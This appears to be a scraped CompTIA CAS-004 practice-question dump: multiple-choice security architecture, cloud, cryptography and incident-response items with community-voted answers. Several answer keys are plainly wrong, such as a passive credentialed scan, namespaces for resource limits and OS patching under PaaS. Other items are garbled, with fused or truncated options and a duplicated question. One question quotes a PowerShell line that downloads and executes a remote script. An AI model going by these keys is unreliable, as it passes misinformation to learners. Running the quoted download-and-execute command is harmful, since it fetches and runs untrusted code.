CAS-004 (1-323)
An organization developed a social media application that is used by customers in multiple remote geographic locations around the world. The organization's headquarters and only datacenter are located in New York City. The Chief Information Security Officer wants to ensure the following requirements are met for the social media application:✑ Low latency for all mobile users to improve the users' experience✑ SSL offloading to improve web server performance✑ Protection against DoS and DDoS attacks✑ High availabilityWhich of the following should the organization implement to BEST ensure all requirements are met? A. A cache server farm in its datacenter B. A load-balanced group of reverse proxy servers with SSL acceleration C. A CDN with the origin set to its datacenter D. Dual gigabit-speed Internet connections with managed DDoS prevention
C. A CDN with the origin set to its datacenter Most Voted
A company undergoing digital transformation is reviewing the resiliency of a CSP and is concerned about meeting SLA requirements in the event of a CSP incident.Which of the following would be BEST to proceed with the transformation? A. An on-premises solution as a backup B. A load balancer with a round-robin configuration C. A multicloud provider solution D. An active-active solution within the same tenant
C. A multicloud provider solution Most Voted
A security analyst is investigating a possible buffer overflow attack. The following output was found on a user's workstation: graphic.linux_randomization.prgWhich of the following technologies would mitigate the manipulation of memory segments? A. NX bit B. ASLR C. DEP D. HSM
B. ASLR Most Voted
A Chief Information Officer is considering migrating all company data to the cloud to save money on expensive SAN storage.Which of the following is a security concern that will MOST likely need to be addressed during migration? A. Latency B. Data exposure C. Data loss D. Data dispersion
B. Data exposure Most Voted
A security engineer estimates the company's popular web application experiences 100 attempted breaches per day. In the past four years, the company's data has been breached two times.Which of the following should the engineer report as the ARO for successful breaches? A. 0.5 B. 8 C. 50 D. 36,500
A. 0.5
A systems administrator is preparing to run a vulnerability scan on a set of information systems in the organization. The systems administrator wants to ensure that the targeted systems produce accurate information especially regarding configuration settings.Which of the following scan types will provide the systems administrator with the MOST accurate information? A. A passive, credentialed scan B. A passive, non-credentialed scan C. An active, non-credentialed scan D. An active, credentialed scan
A. A passive, credentialed scan
An IT administrator is reviewing all the servers in an organization and notices that a server is missing crucial practice against a recent exploit that could gain root access.Which of the following describes the administrator's discovery? A. A vulnerability B. A threat C. A breach D. A risk
A. A vulnerability Most Voted
An organization's existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.Which of the following designs would be BEST for the CISO to use? A. Adding a second redundant layer of alternate vendor VPN concentrators B. Using Base64 encoding within the existing site-to-site VPN connections C. Distributing security resources across VPN sites D. Implementing IDS services with each VPN concentrator E. Transitioning to a container-based architecture for site-based services
A. Adding a second redundant layer of alternate vendor VPN concentrators Most Voted
A development team created a mobile application that contacts a company's back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.Which of the following would BEST safeguard the APIs? (Choose two.) A. Bot protection B. OAuth 2.0 C. Input validation D. Autoscaling endpoints E. Rate limiting F. CSRF protection
A. Bot protection Most Voted E. Rate limiting
A software company is developing an application in which data must be encrypted with a cipher that requires the following:✑ Initialization vector✑ Low latency✑ Suitable for streamingWhich of the following ciphers should the company use? A. Cipher feedback B. Cipher block chaining message authentication code C. Cipher block chaining D. Electronic codebook
A. Cipher feedback Most Voted
A company created an external application for its customers. A security researcher now reports that the application has a serious LDAP injection vulnerability that could be leveraged to bypass authentication and authorization.Which of the following actions would BEST resolve the issue? (Choose two.) A. Conduct input sanitization. B. Deploy a SIEM. C. Use containers. D. Patch the OS E. Deploy a WAF. F. Deploy a reverse proxy G. Deploy an IDS.
A. Conduct input sanitization. Most Voted E. Deploy a WAF. Most Voted F. Deploy a reverse proxy
A security analyst is performing a vulnerability assessment on behalf of a client. The analyst must define what constitutes a risk to the organization.Which of the following should be the analyst's FIRST action? A. Create a full inventory of information and data assets. B. Ascertain the impact of an attack on the availability of crucial resources. C. Determine which security compliance standards should be followed. D. Perform a full system penetration test to determine the vulnerabilities.
A. Create a full inventory of information and data assets. Most Voted
A satellite communications ISP frequently experiences outages and degraded modes of operation over one of its legacy satellite links due to the use of deprecated hardware and software. Three days per week, on average, a contracted company must follow a checklist of 16 different high-latency commands that must be run in serial to restore nominal performance. The ISP wants this process to be automated.Which of the following techniques would be BEST suited for this requirement? A. Deploy SOAR utilities and runbooks. B. Replace the associated hardware. C. Provide the contractors with direct access to satellite telemetry data. D. Reduce link latency on the affected ground and satellite segments.
A. Deploy SOAR utilities and runbooks. Most Voted
A company processes data subject to NDAs with partners that define the processing and storage constraints for the covered data. The agreements currently do not permit moving the covered data to the cloud, and the company would like to renegotiate the terms of the agreements.Which of the following would MOST likely help the company gain consensus to move the data to the cloud? A. Designing data protection schemes to mitigate the risk of loss due to multitenancy B. Implementing redundant stores and services across diverse CSPs for high availability C. Emulating OS and hardware architectures to blur operations from CSP view D. Purchasing managed FIM services to alert on detected modifications to covered data
A. Designing data protection schemes to mitigate the risk of loss due to multitenancy Most Voted
A user in the finance department uses a laptop to store a spreadsheet that contains confidential financial information for the company. Which of the following would be the BEST way to protect the file while the user travels between locations? (Choose two.) A. Encrypt the laptop with full disk encryption. B. Back up the file to an encrypted flash drive. C. Place an ACL on the file to only allow access to specified users. D. Store the file in the user profile. E. Place an ACL on the file to deny access to everyone. F. Enable access logging on the file.
A. Encrypt the laptop with full disk encryption. Most Voted B. Back up the file to an encrypted flash drive. C. Place an ACL on the file to only allow access to specified users. Most Voted
A user in the finance department uses a laptop to store a spreadsheet that contains confidential financial information for the company. Which of the following would be the BEST way to protect the file while the user travels between locations? (Choose two.) A. Encrypt the laptop with full disk encryption. Most Voted B. Back up the file to an encrypted flash drive. C. Place an ACL on the file to only allow access to specified users. Most Voted D. Store the file in the user profile. E. Place an ACL on the file to deny access to everyone. F. Enable access logging on the file.
A. Encrypt the laptop with full disk encryption. Most Voted B. Back up the file to an encrypted flash drive. C. Place an ACL on the file to only allow access to specified users. Most Voted
A junior developer is informed about the impact of new malware on an Advanced RISC Machine (ARM) CPU, and the code must be fixed accordingly. Based on the debug, the malware is able to insert itself in another process memory location.Which of the following technologies can the developer enable on the ARM architecture to prevent this type of malware? A. Execute never B. No-execute C. Total memory encryption D. Virtual memory protection
A. Execute never Most Voted
A security engineer needs to implement a solution to increase the security posture of user endpoints by providing more visibility and control over local administrator accounts. The endpoint security team is overwhelmed with alerts and wants a solution that has minimal operational burdens. Additionally, the solution must maintain a positive user experience after implementation.Which of the following is the BEST solution to meet these objectives? A. Implement Privileged Access Management (PAM), keep users in the local administrators group, and enable local administrator account monitoring. B. Implement PAM, remove users from the local administrators group, and prompt users for explicit approval when elevated privileges are required. C. Implement EDR, remove users from the local administrators group, and enable privilege escalation monitoring. D. Implement EDR, keep users in the local administrators group, and enable us
A. Implement Privileged Access Management (PAM), keep users in the local administrators group, and enable local administrator account monitoring.
A company is preparing to deploy a global service.Which of the following must the company do to ensure GDPR compliance? (Choose two.) A. Inform users regarding what data is stored. B. Provide opt-in/out for marketing messages. C. Provide data deletion capabilities. D. Provide optional data encryption. E. Grant data access to third parties. F. Provide alternative authentication techniques.
A. Inform users regarding what data is stored. Most Voted C. Provide data deletion capabilities. Most Voted
A company is moving most of its customer-facing production systems to the cloud-facing production systems to the cloud. IaaS is the service model being used.The Chief Executive Officer is concerned about the type of encryption available and requires the solution must have the highest level of security.Which of the following encryption methods should the cloud security engineer select during the implementation phase? A. Instance-based B. Storage-based C. Proxy-based D. Array controller-based
A. Instance-based Most Voted
During a remodel, a company's computer equipment was moved to a secure storage room with cameras positioned on both sides of the door. The door is locked using a card reader issued by the security team, and only the security team and department managers have access to the room. The company wants to be able to identify any unauthorized individuals who enter the storage room by following an authorized employee.Which of the following processes would BEST satisfy this requirement? A. Monitor camera footage corresponding to a valid access request. B. Require both security and management to open the door. C. Require department managers to review denied-access requests. D. Issue new entry badges on a weekly basis.
A. Monitor camera footage corresponding to a valid access request. Most Voted
An e-commerce company is running a web server on premises, and the resource utilization is usually less than 30%. During the last two holiday seasons, the server experienced performance issues because of too many connections, and several customers were not able to finalize purchase orders. The company is looking to change the server configuration to avoid this kind of performance issue.Which of the following is the MOST cost-effective solution? A. Move the server to a cloud provider. B. Change the operating system. C. Buy a new server and create an active-active cluster. D. Upgrade the server with a new one.
A. Move the server to a cloud provider. Most Voted
A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company's services to ensure false positives do not drop legitimate traffic.Which of the following would satisfy the requirement? A. NIDS B. NIPS C. WAF D. Reverse proxy
A. NIDS Most Voted
A home automation company just purchased and installed tools for its SOC to enable incident identification and response on software the company develops. The company would like to prioritize defenses against the following attack scenarios:✑ Unauthorized insertions into application development environments✑ Authorized insiders making unauthorized changes to environment configurationsWhich of the following actions will enable the data feeds needed to detect these types of attacks on development environments? (Choose two.) A. Perform static code analysis of committed code and generate summary reports. B. Implement an XML gateway and monitor for policy violations. C. Monitor dependency management tools and report on susceptible third-party libraries. D. Install an IDS on the development subnet and passively monitor for vulnerable services. E. Model user behavior and monitor for deviations from normal. F. Continuously
A. Perform static code analysis of committed code and generate summary reports. F. Continuously monitor code commits to repositories and generate summary logs.
A company has hired a security architect to address several service outages on the endpoints due to new malware. The Chief Executive Officer's laptop was impacted while working from home. The goal is to prevent further endpoint disruption. The edge network is protected by a web proxy.Which of the following solutions should the security architect recommend? A. Replace the current antivirus with an EDR solution. B. Remove the web proxy and install a UTM appliance. C. Implement a deny list feature on the endpoints. D. Add a firewall module on the current antivirus solution.
A. Replace the current antivirus with an EDR solution. Most Voted
In preparation for the holiday season, a company redesigned the system that manages retail sales and moved it to a cloud service provider. The new infrastructure did not meet the company's availability requirements. During a postmortem analysis, the following issues were highlighted:1. International users reported latency when images on the web page were initially loading.2. During times of report processing, users reported issues with inventory when attempting to place orders.3. Despite the fact that ten new API servers were added, the load across servers was heavy at peak times.Which of the following infrastructure design changes would be BEST for the organization to implement to avoid these issues in the future? A. Serve static content via distributed CDNs, create a read replica of the central database and pull reports from there, and auto-scale API servers based on performance. B. Increase the bandwidth for the s
A. Serve static content via distributed CDNs, create a read replica of the central database and pull reports from there, and auto-scale API servers based on performance. Most Voted
A company has decided to purchase a license for software that is used to operate a mission-critical process. The third-party developer is new to the industry but is delivering what the company needs at this time.Which of the following BEST describes the reason why utilizing a source code escrow will reduce the operational risk to the company if the third party stops supporting the application? A. The company will have access to the latest version to continue development. B. The company will be able to force the third-party developer to continue support. C. The company will be able to manage the third-party developer's development process. D. The company will be paid by the third-party developer to hire a new development team.
A. The company will have access to the latest version to continue development. Most Voted
A pharmaceutical company recently experienced a security breach within its customer-facing web portal. The attackers performed a SQL injection attack and exported tables from the company's managed database, exposing customer information.The company hosts the application with a CSP utilizing the IaaS model. Which of the following parties is ultimately responsible for the breach? A. The pharmaceutical company B. The cloud software provider C. The web portal software vendor D. The database software vendor
A. The pharmaceutical company Most Voted
A developer wants to maintain integrity to each module of a program and ensure the code cannot be altered by malicious users.Which of the following would be BEST for the developer to perform? (Choose two.) A. Utilize code signing by a trusted third party. B. Implement certificate-based authentication. C. Verify MD5 hashes. D. Compress the program with a password. E. Encrypt with 3DES. F. Make the DACL read-only.
A. Utilize code signing by a trusted third party. Most VotedMost Voted B. Implement certificate-based authentication. Most Voted C. Verify MD5 hashes. Most Voted
A security engineer thinks the development team has been hard-coding sensitive environment variables in its code.Which of the following would BEST secure the company's CI/CD pipeline? A. Utilizing a trusted secrets manager B. Performing DAST on a weekly basis C. Introducing the use of container orchestration D. Deploying instance tagging
A. Utilizing a trusted secrets manager Most Voted
A company publishes several APIs for customers and is required to use keys to segregate customer data sets.Which of the following would be BEST to use to store customer keys? A. A trusted platform module B. A hardware security module C. A localized key store D. A public key infrastructure
B. A hardware security module Most Voted
A company's SOC has received threat intelligence about an active campaign utilizing a specific vulnerability. The company would like to determine whether it is vulnerable to this active campaign.Which of the following should the company use to make this determination? A. Threat hunting B. A system penetration test C. Log analysis within the SIEM tool D. The Cyber Kill Chain Reveal Solution
B. A system penetration test
A recent data breach stemmed from unauthorized access to an employee's company account with a cloud-based productivity suite. The attacker exploited excessive permissions granted to a third-party OAuth application to collect sensitive information.Which of the following BEST mitigates inappropriate access and permissions issues? A. SIEM B. CASB C. WAF D. SOAR Reveal Solution
B. CASB Most Voted
A security engineer is hardening a company's multihomed SFTP server. When scanning a public-facing network interface, the engineer finds the following ports are open:✑ 25✑ 110✑ 137✑ 138✑ 139✑ 445Internal Windows clients are used to transferring files to the server to stage them for customer download as part of the company's distribution process.Which of the following would be the BEST solution to harden the system? A. Close ports 110, 138, and 139. Bind ports 22, 25, and 137 to only the internal interface. B. Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface. C. Close ports 22 and 139. Bind ports 137, 138, and 445 to only the internal interface. D. Close ports 22, 137, and 138. Bind ports 110 and 445 to only the internal interface.
B. Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface. Most Voted
A user from the sales department opened a suspicious file attachment. The sales department then contacted the SOC to investigate a number of unresponsive systems, and the team successfully identified the file and the origin of the attack.Which of the following is the NEXT step of the incident response plan? A. Remediation B. Containment C. Response D. Recovery
B. Containment Most Voted
A company is implementing SSL inspection. During the next six months, multiple web applications that will be separated out with subdomains will be deployed.Which of the following will allow the inspection of the data without multiple certificate deployments? A. Include all available cipher suites. B. Create a wildcard certificate. C. Use a third-party CA. D. Implement certificate pinning.
B. Create a wildcard certificate. Most Voted
A company wants to protect its intellectual property from theft. The company has already applied ACLs and DACs.Which of the following should the company use to prevent data theft? A. Watermarking B. DRM C. NDA D. Access logging
B. DRM Most Voted
While investigating a security event, an analyst finds evidence that a user opened an email attachment from an unknown source. Shortly after the user opened the attachment, a group of servers experienced a large amount of network and resource activity. Upon investigating the servers, the analyst discovers the servers were encrypted by ransomware that is demanding payment within 48 hours or all data will be destroyed. The company has no response plans for ransomware.Which of the following is the NEXT step the analyst should take after reporting the incident to the management team? A. Pay the ransom within 48 hours. B. Isolate the servers to prevent the spread. C. Notify law enforcement. D. Request that the affected servers be restored immediately.
B. Isolate the servers to prevent the spread. Most Voted
Which of the following terms refers to the delivery of encryption keys to a CASB or a third-party entity? A. Key sharing B. Key distribution C. Key recovery D. Key escrow
B. Key distribution Most Voted
As part of the customer registration process to access a new bank account, customers are required to upload a number of documents, including their passports and driver's licenses. The process also requires customers to take a current photo of themselves to be compared against provided documentation.Which of the following BEST describes this process? A. Deepfake B. Know your customer C. Identity proofing D. Passwordless
B. Know your customer Most Voted C. Identity proofing Most Voted
A small company recently developed prototype technology for a military program. The company's security engineer is concerned about potential theft of the newly developed, proprietary information.Which of the following should the security engineer do to BEST manage the threats proactively? A. Join an information-sharing community that is relevant to the company. B. Leverage the MITRE ATT&CK framework to map the TTP. C. Use OSINT techniques to evaluate and analyze the threats. D. Update security awareness training to address new threats, such as best practices for data security.
B. Leverage the MITRE ATT&CK framework to map the TTP. Most Voted D. Update security awareness training to address new threats, such as best practices for data security. Most Voted
Due to locality and budget constraints, an organization's satellite office has a lower bandwidth allocation than other offices in the organization. As a result, the local security infrastructure staff is assessing architectural options that will help preserve network bandwidth and increase speed to both internal and external resources while not sacrificing threat visibility.Which of the following would be the BEST option to implement? A. Distributed connection allocation B. Local caching C. Content delivery network D. SD-WAN vertical heterogeneity
B. Local caching Most Voted
A threat hunting team receives a report about possible APT activity in the network.Which of the following threat management frameworks should the team implement? A. NIST SP 800-53 B. MITRE ATT&CK C. The Cyber Kill Chain D. The Diamond Model of Intrusion Analysis
B. MITRE ATT&CK Most Voted
Which of the following is the MOST important cloud-specific risk from the CSP's viewpoint? A. Isolation control failure B. Management plane breach C. Insecure data deletion D. Resource exhaustion
B. Management plane breach Most Voted
A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements:✑ Support all phases of the SDLC.✑ Use tailored website portal software.✑ Allow the company to build and use its own gateway software.✑ Utilize its own data management platform.✑ Continue using agent-based security tools.Which of the following cloud-computing models should the CIO implement? A. SaaS B. PaaS C. MaaS D. IaaS Reveal Solution
B. PaaS Most Voted
A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system.Which of the following security responsibilities will the DevOps team need to perform? A. Securely configure the authentication mechanisms. B. Patch the infrastructure at the operating system. C. Execute port scanning against the services. D. Upgrade the service as part of life-cycle management.
B. Patch the infrastructure at the operating system. Most Voted
An organization is implementing a new identity and access management architecture with the following objectives:✑ Supporting MFA against on-premises infrastructure✑ Improving the user experience by integrating with SaaS applications✑ Applying risk-based policies based on location✑ Performing just-in-time provisioningWhich of the following authentication protocols should the organization implement to support these requirements? A. Kerberos and TACACS B. SAML and RADIUS C. OAuth and OpenID D. OTP and 802.1X
B. SAML and RADIUS Most Voted
Which of the following represents the MOST significant benefit of implementing a passwordless authentication solution? A. Biometric authenticators are immutable. B. The likelihood of account compromise is reduced. C. Zero trust is achieved. D. Privacy risks are minimized.
B. The likelihood of account compromise is reduced. Most Voted
A business stores personal client data of individuals residing in the EU in order to process requests for mortgage loan approvals.Which of the following does the business's IT manager need to consider? A. The availability of personal data B. The right to personal data erasure C. The company's annual revenue D. The language of the web application
B. The right to personal data erasure
Which of the following are risks associated with vendor lock-in? (Choose two.) A. The client can seamlessly move data. B. The vendor can change product offerings. C. The client receives a sufficient level of service. D. The client experiences decreased quality of service. E. The client can leverage a multicloud approach. F. The client experiences increased interoperability.
B. The vendor can change product offerings. Most Voted D. The client experiences decreased quality of service. Most Voted
A company plans to build an entirely remote workforce that utilizes a cloud-based infrastructure. The Chief Information Security Officer asks the security engineer to design connectivity to meet the following requirements:✑ Only users with corporate-owned devices can directly access servers hosted by the cloud provider.✑ The company can control what SaaS applications each individual user can access.✑ User browser activity can be monitored.Which of the following solutions would BEST meet these requirements? A. IAM gateway, MDM, and reverse proxy B. VPN, CASB, and secure web gateway C. SSL tunnel, DLP, and host-based firewall D. API gateway, UEM, and forward proxy
B. VPN, CASB, and secure web gateway
An organization wants to perform a scan of all its systems against best practice security configurations.Which of the following SCAP standards, when combined, will enable the organization to view each of the configuration checks in a machine-readable checklist format for full automation? (Choose two.) A. ARF B. XCCDF C. CPE D. CVE E. CVSS F. OVAL
B. XCCDF F. OVAL
Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted: A. when it is passed across a local network. B. in memory during processing C. when it is written to a system's solid-state drive. D. by an enterprise hardware security module.
B. in memory during processing Most Voted
A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government.Which of the following should be taken into consideration during the process of releasing the drive to the government? A. Encryption in transit B. Legal issues C. Chain of custody D. Order of volatility E. Key exchange Reveal Solution
C. Chain of custody Most Voted
An organization is referencing NIST best practices for BCP creation while reviewing current internal organizational processes for mission-essential items.Which of the following phases establishes the identification and prioritization of critical systems and functions? A. Review a recent gap analysis. B. Perform a cost-benefit analysis. C. Conduct a business impact analysis. D. Develop an exposure factor matrix.
C. Conduct a business impact analysis. Most Voted
A security architect works for a manufacturing organization that has many different branch offices. The architect is looking for a way to reduce traffic and ensure the branch offices receive the latest copy of revoked certificates issued by the CA at the organization's headquarters location. The solution must also have the lowest power requirement on the CA.Which of the following is the BEST solution? A. Deploy an RA on each branch office. B. Use Delta CRLs at the branches. C. Configure clients to use OCSP. D. Send the new CRLs by using GPO.
C. Configure clients to use OCSP.
A network architect is designing a new SD-WAN architecture to connect all local sites to a central hub site. The hub is then responsible for redirecting traffic to public cloud and datacenter applications. The SD-WAN routers are managed through a SaaS, and the same security policy is applied to staff whether working in the office or at a remote location. The main requirements are the following:1. The network supports core applications that have 99.99% uptime.2. Configuration updates to the SD-WAN routers can only be initiated from the management service.3. Documents downloaded from websites must be scanned for malware.Which of the following solutions should the network architect implement to meet the requirements? A. Reverse proxy, stateful firewalls, and VPNs at the local sites B. IDSs, WAFs, and forward proxy IDS C. DoS protection at the hub site, mutual certificate authentication, and cloud proxy D. IPSs at the hu
C. DoS protection at the hub site, mutual certificate authentication, and cloud proxy
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell `IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois`Which of the following security controls would have alerted and prevented the next phase of the attack? A. Antivirus and UEBA B. Reverse proxy and sandbox C. EDR and application approved list D. Forward proxy and MFA
C. EDR and application approved list Most Voted
A shipping company that is trying to eliminate entire classes of threats is developing an SELinux policy to ensure its custom Android devices are used exclusively for package tracking.After compiling and implementing the policy, in which of the following modes must the company ensure the devices are configured to run? A. Protecting B. Permissive C. Enforcing D. Mandatory Reveal Solution
C. Enforcing Most Voted
A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.Which of the following BEST describes the type of malware the solution should protect against? A. Worm B. Logic bomb C. Fileless D. Rootkit
C. Fileless Most Voted
A company's Chief Information Officer wants to implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide analysis of malicious activities to determine the processes or users involved.Which of the following would provide this information? A. HIPS B. UEBA C. HIDS D. NIDS
C. HIDS Most Voted
A SOC analyst is reviewing malicious activity on an external, exposed web server. During the investigation, the analyst determines specific traffic is not being logged, and there is no visibility from the WAF for the web application.Which of the following is the MOST likely cause? A. The user agent client is not compatible with the WAF. B. A certificate on the WAF is expired. C. HTTP traffic is not forwarding to HTTPS to decrypt. D. Old, vulnerable cipher suites are still being used.
C. HTTP traffic is not forwarding to HTTPS to decrypt. Most Voted
A high-severity vulnerability was found on a web application and introduced to the enterprise. The vulnerability could allow an unauthorized user to utilize an open- source library to view privileged user information. The enterprise is unwilling to accept the risk, but the developers cannot fix the issue right away.Which of the following should be implemented to reduce the risk to an acceptable level until the issue can be fixed? A. Scan the code with a static code analyzer, change privileged user passwords, and provide security training. B. Change privileged usernames, review the OS logs, and deploy hardware tokens. C. Implement MFA, review the application logs, and deploy a WAF. D. Deploy a VPN, configure an official open-source library repository, and perform a full application review for vulnerabilities.
C. Implement MFA, review the application logs, and deploy a WAF. Most Voted
Clients are reporting slowness when attempting to access a series of load-balanced APIs that do not require authentication. The servers that host the APIs are showing heavy CPU utilization. No alerts are found on the WAFs sitting in front of the APIs.Which of the following should a security engineer recommend to BEST remedy the performance issues in a timely manner? A. Implement rate limiting on the API. B. Implement geoblocking on the WAF. C. Implement OAuth 2.0 on the API. D. Implement input validation on the API.
C. Implement OAuth 2.0 on the API. Most Voted
After a security incident, a network security engineer discovers that a portion of the company's sensitive external traffic has been redirected through a secondaryISP that is not normally used.Which of the following would BEST secure the routes while allowing the network to function in the event of a single provider failure? A. Disable BGP and implement a single static route for each internal network. B. Implement a BGP route reflector. C. Implement an inbound BGP prefix list. D. Disable BGP and implement OSPF. Reveal Solution Discussion 18
C. Implement an inbound BGP prefix list.
Some end users of an e-commerce website are reporting a delay when browsing pages. The website uses TLS 1.2. A security architect for the website troubleshoots by connecting from home to the website and capturing traffic via Wireshark. The security architect finds that the issue is the time required to validate the certificate. Which of the following solutions should the security architect recommend? A. Adding more nodes to the web server clusters B. Changing the cipher algorithm used on the web server C. Implementing OCSP stapling on the server D. Upgrading to TLS 1.3
C. Implementing OCSP stapling on the server Most Voted
A small business requires a low-cost approach to theft detection for the audio recordings it produces and sells.Which of the following techniques will MOST likely meet the business's needs? A. Performing deep-packet inspection of all digital audio files B. Adding identifying filesystem metadata to the digital audio files C. Implementing steganography D. Purchasing and installing a DRM suite
C. Implementing steganography Most Voted
Ransomware encrypted the entire human resources fileshare for a large financial institution. Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that theRPO for a disaster recovery event for this data classification is 24 hours.Based on RPO requirements, which of the following recommendations should the management team make? A. Leave the current backup schedule intact and pay the ransom to decrypt the data. B. Leave the current backup schedule intact and make the human resources fileshare read-only. C. Increase the frequency of backups and create SIEM alerts for IOCs. D. Decrease the frequency of backups and pay the ransom to decrypt the data.
C. Increase the frequency of backups and create SIEM alerts for IOCs. Most Voted
A security analyst is researching containerization concepts for an organization. The analyst is concerned about potential resource exhaustion scenarios on theDocker host due to a single application that is overconsuming available resources.Which of the following core Linux concepts BEST reflects the ability to limit resource allocation to containers? A. Union filesystem overlay B. Cgroups C. Linux namespaces D. Device mapper Reveal Solution
C. Linux namespaces Most Voted
An organization is designing a network architecture that must meet the following requirements:✑ Users will only be able to access predefined services.✑ Each user will have a unique allow list defined for access.✑ The system will construct one-to-one subject/object access paths dynamically.Which of the following architectural designs should the organization use to meet these requirements? A. Peer-to-peer secure communications enabled by mobile applications B. Proxied application data connections enabled by API gateways C. Microsegmentation enabled by software-defined networking D. VLANs enabled by network infrastructure devices
C. Microsegmentation enabled by software-defined networking Most Voted
An organization is considering a BYOD standard to support remote working. The first iteration of the solution will utilize only approved collaboration applications and the ability to move corporate data between those applications. The security team has concerns about the following:✑ Unstructured data being exfiltrated after an employee leaves the organization✑ Data being exfiltrated as a result of compromised credentials✑ Sensitive information in emails being exfiltratedWhich of the following solutions should the security team implement to mitigate the risk of data loss? A. Mobile device management, remote wipe, and data loss detection B. Conditional access, DoH, and full disk encryption C. Mobile application management, MFA, and DRM D. Certificates, DLP, and geofencing
C. Mobile application management, MFA, and DRM Most Voted
An organization recently started processing, transmitting, and storing its customers' credit card information. Within a week of doing so, the organization suffered a massive breach that resulted in the exposure of the customers' information.Which of the following provides the BEST guidance for protecting such information while it is at rest and in transit? A. NIST B. GDPR C. PCI DSS D. ISO
C. PCI DSS Most Voted
An organization recently experienced a ransomware attack. The security team leader is concerned about the attack reoccurring. However, no further security measures have been implemented.Which of the following processes can be used to identify potential prevention recommendations? A. Detection B. Remediation C. Preparation D. Recovery
C. Preparation Most Voted
A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company's Chief Financial Officer loses a phone multiple times a year.Which of the following will MOST likely secure the data on the lost device? A. Require a VPN to be active to access company data. B. Set up different profiles based on the person's risk. C. Remotely wipe the device. D. Require MFA to access company applications. Reveal Solution Discussion 16
C. Remotely wipe the device. Most Voted
A security analyst receives an alert from the SIEM regarding unusual activity on an authorized public SSH jump server. To further investigate, the analyst pulls the event logs directly from /var/log/auth.log: graphic.ssh_auth_log.Which of the following actions would BEST address the potential risks posed by the activity in the logs? A. Altering the misconfigured service account password B. Modifying the AllowUsers configuration directive C. Restricting external port 22 access D. Implementing host-key preferences
C. Restricting external port 22 access
As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents.Which of the following BEST describes this kind of risk response? A. Risk rejection B. Risk mitigation C. Risk transference D. Risk avoidance
C. Risk transference Most Voted
An organization is preparing to migrate its production environment systems from an on-premises environment to a cloud service. The lead security architect is concerned that the organization's current methods for addressing risk may not be possible in the cloud environment.Which of the following BEST describes the reason why traditional methods of addressing risk may not be possible in the cloud? A. Migrating operations assumes the acceptance of all risk. B. Cloud providers are unable to avoid risk. C. Specific risks cannot be transferred to the cloud provider. D. Risks to data in the cloud cannot be mitigated.
C. Specific risks cannot be transferred to the cloud provider. Most Voted
The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight.Which of the following testing methods would be BEST for the engineer to utilize in this situation? A. Software composition analysis B. Code obfuscation C. Static analysis D. Dynamic analysis
C. Static analysis Most Voted
An application server was recently upgraded to prefer TLS 1.3, and now users are unable to connect their clients to the server. Attempts to reproduce the error are confirmed, and clients are reporting the following:ERR_SSL_VERSION_OR_CIPHER_MISMATCHWhich of the following is MOST likely the root cause? A. The client application is testing PFS. B. The client application is configured to use ECDHE. C. The client application is configured to use RC4. D. The client application is configured to use AES-256 in GCM.
C. The client application is configured to use RC4. Most Voted
A security engineer was auditing an organization's current software development practice and discovered that multiple open-source libraries were Integrated into the organization's software. The organization currently performs SAST and DAST on the software it develops.Which of the following should the organization incorporate into the SDLC to ensure the security of the open-source libraries? A. Perform additional SAST/DAST on the open-source libraries. B. Implement the SDLC security guidelines. C. Track D. Perform unit testing of the open-source libraries.the library versions and monitor the CVE website for related vulnerabilities. D. Perform unit testing of the open-source libraries.
C. Track D. Perform unit testing of the open-source libraries.the library versions and monitor the CVE website for related vulnerabilities. D. Perform unit testing of the open-source libraries
All staff at a company have started working remotely due to a global pandemic. To transition to remote work, the company has migrated to SaaS collaboration tools. The human resources department wants to use these tools to process sensitive information but is concerned the data could be:✑ Leaked to the media via printing of the documents✑ Sent to a personal email addressAccessed and viewed by systems administrators✑ Uploaded to a file storage siteWhich of the following would mitigate the department's concerns? A. Data loss detection, reverse proxy, EDR, and PGP B. VDI, proxy, CASB, and DRM C. Watermarking, forward proxy, DLP, and MFA D. Proxy, secure VPN, endpoint encryption, and AV Reveal Solution Discussion 20
C. Watermarking, forward proxy, DLP, and MFA Most Voted
A technician is reviewing the logs and notices a large number of files were transferred to remote sites over the course of three months. This activity then stopped.The files were transferred via TLS-protected HTTP sessions from systems that do not send traffic to those sites.The technician will define this threat as: A. a decrypting RSA using obsolete and weakened encryption attack. B. a zero-day attack. C. an advanced persistent threat. D. an on-path attack.
C. an advanced persistent threat. Most Voted
A forensic investigator would use the foremost command for: A. cloning disks. B. analyzing network-captured packets. C. recovering lost files. D. extracting features such as email addresses.
C. recovering lost files. Most Voted
